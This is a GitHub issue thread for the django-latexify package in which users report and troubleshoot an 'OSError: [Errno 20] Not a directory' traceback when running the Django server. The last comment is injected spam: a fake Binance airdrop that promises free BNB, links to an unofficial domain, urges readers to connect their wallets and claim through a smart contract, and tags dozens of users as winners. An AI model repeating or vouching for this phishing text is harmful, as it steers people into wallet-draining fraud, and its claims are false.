### ISSUE TITLE
Not a directory

### ISSUE THREAD

**Issue by kvedes** [AmmsA/django-latexify#3]
I have installed latexify as described in the readme, and it seems to be succesfull. But when I add latexify to installed apps and try to run the server I get the following error:

```
Unhandled exception in thread started by <function wrapper at 0x7fa214ae0050>
Performing system checks...

System check identified no issues (0 silenced).
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/django/utils/autoreload.py", line 227, in wrapper
    fn(*args, **kwargs)
  File "/usr/local/lib/python2.7/dist-packages/django/core/management/commands/runserver.py", line 128, in inner_run
    self.check_migrations()
  File "/usr/local/lib/python2.7/dist-packages/django/core/management/base.py", line 422, in check_migrations
    executor = MigrationExecutor(connections[DEFAULT_DB_ALIAS])
  File "/usr/local/lib/python2.7/dist-packages/django/db/migrations/executor.py", line 20, in __init__
    self.loader = MigrationLoader(self.connection)
  File "/usr/local/lib/python2.7/dist-packages/django/db/migrations/loader.py", line 52, in __init__
    self.build_graph()
  File "/usr/local/lib/python2.7/dist-packages/django/db/migrations/loader.py", line 203, in build_graph
    self.load_disk()
  File "/usr/local/lib/python2.7/dist-packages/django/db/migrations/loader.py", line 107, in load_disk
    for name in os.listdir(directory):
OSError: [Errno 20] Not a directory: '/usr/local/lib/python2.7/dist-packages/django_'
```

**Comment by ammsa** [comment]
Can you please indicate what Django version you're using? 
The traceback doesn't give much information on what is going on or if it's due to the app.

**Comment by kvedes** [comment]
Sorry about the lag of information. I'm running Django 1.11.3 in python 2.7.13 on Xubuntu 17.04. Do you need additional output?

**Comment by ammsa** [comment]
Seems to be working fine for me using Django 1.11.3 and python 2.7.13. 
See the working example I just pushed with the same versions [here](https://github.com/AmmsA/django-latexify/tree/django1.11.3-test).

**Comment by kvedes** [comment]
I get the exact same error when running your example code. The problem also occurs in python 3.5.

**Comment by ammsa** [comment]
Are you using a virtual environment? Can you please git fetch & pull the branch and do the following:

```
source latexify_test_env/bin/activate
cd latex
python manage.py runserver
```
Then in your browser, open `127.0.0.1:8000`.

**Comment by ammsa** [comment]
@kvedes Please let me know if you are still having the issue.

**Comment by rhyspang** [comment]
I got exact same error too: OSError: [Errno 20] Not a directory
python 2.7.13
django 1.10
mac os

**Comment by knofte** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @YanRui9527, @jknipp, @anthonycarminati, @daoanhnhat1995, @upkrf, @MartinTeeVarga, @cdleon, @snithish, @aoikurokawa, @hjm1fb, @alexjgraham, @MOZGIII, @aodin, @zachmdsi, @riversyang, @derrickburns, @vikrant1708, @LucasMetal, @gin, @fangasvsass, @aprat, @shaneowens, @lzhang, @mj-vn, @morion4000, @ORiON-, @johnMana, @souhailkaoussi-pro, @ajtruex, @Assawal, @qqonline, @Claudiabttrcp, @dakwu, @janklimo, @jdwittenauer, @siukalov, @thenotoriousbige, @Tiaan-R, @rodrigoalviani, @sudotty, @julianlehr, @leesander1, @Chufyjj, @KeithYeh, @jkamdjou, @ambertch, @frozenfiber, @teym, @wvbraun, @yousefal
